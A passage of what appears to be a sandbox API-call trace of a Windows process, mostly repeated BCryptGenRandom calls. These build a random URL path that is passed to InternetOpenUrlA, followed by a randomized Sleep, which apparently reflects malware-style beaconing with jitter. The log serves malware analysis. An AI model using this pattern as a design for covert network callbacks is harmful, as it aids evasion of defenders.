dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.474] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.474] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.474] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.474] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.474] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.474] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.475] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.475] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.475] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.476] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.476] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.476] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.476] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.477] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.477] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.477] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.645] GetProcessHeap () returned 0x440000 [0189.645] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0189.646] lstrcpyA (in: lpString1=0x473b90, lpString2="" | out: lpString1="") returned="" [0189.646] lstrcatA (in: lpString1="", lpString2="/hJxnva1U5w4syY567Euoov1v68N72yrPIm4tg/gHg8qblf5nvdouaA32i8lt1kr43gh1v73rbwcxiBYOc79x4/6ezrzW2hhS5oylxNGXSieXqxi10hzcb9c8x1d/aGj28dsNT4h23ebm9x8khUAwkchn51ib3g4e6aAbk8tx5va9/" | out: lpString1="/hJxnva1U5w4syY567Euoov1v68N72yrPIm4tg/gHg8qblf5nvdouaA32i8lt1kr43gh1v73rbwcxiBYOc79x4/6ezrzW2hhS5oylxNGXSieXqxi10hzcb9c8x1d/aGj28dsNT4h23ebm9x8khUAwkchn51ib3g4e6aAbk8tx5va9/") returned="/hJxnva1U5w4syY567Euoov1v68N72yrPIm4tg/gHg8qblf5nvdouaA32i8lt1kr43gh1v73rbwcxiBYOc79x4/6ezrzW2hhS5oylxNGXSieXqxi10hzcb9c8x1d/aGj28dsNT4h23ebm9x8khUAwkchn51ib3g4e6aAbk8tx5va9/" [0189.646] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0189.646] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="/hJxnva1U5w4syY567Euoov1v68N72yrPIm4tg/gHg8qblf5nvdouaA32i8lt1kr43gh1v73rbwcxiBYOc79x4/6ezrzW2hhS5oylxNGXSieXqxi10hzcb9c8x1d/aGj28dsNT4h23ebm9x8khUAwkchn51ib3g4e6aAbk8tx5va9/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0189.646] GetProcessHeap () returned 0x440000 [0189.646] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0189.646] GetProcessHeap () returned 0x440000 [0189.646] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d6300 | out: hHeap=0x440000) returned 1 [0189.646] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0189.647] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0189.647] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0189.647] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0189.647] Sleep (dwMilliseconds=0x1620e) [0189.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0189.871] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0189.871] GetProcessHeap () returned 0x440000 [0189.871] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16580 [0189.871] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0189.871] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16581, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a16581) returned 0x0 [0189.871] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.872] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.872] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.872] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.872] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.872] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.872] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.873] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.873] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.873] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.873] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.873] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0189.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0189.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0189.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a165b1, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x3a165b1) returned 0x0 [0189.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.883] BCryptGenRandom (in: 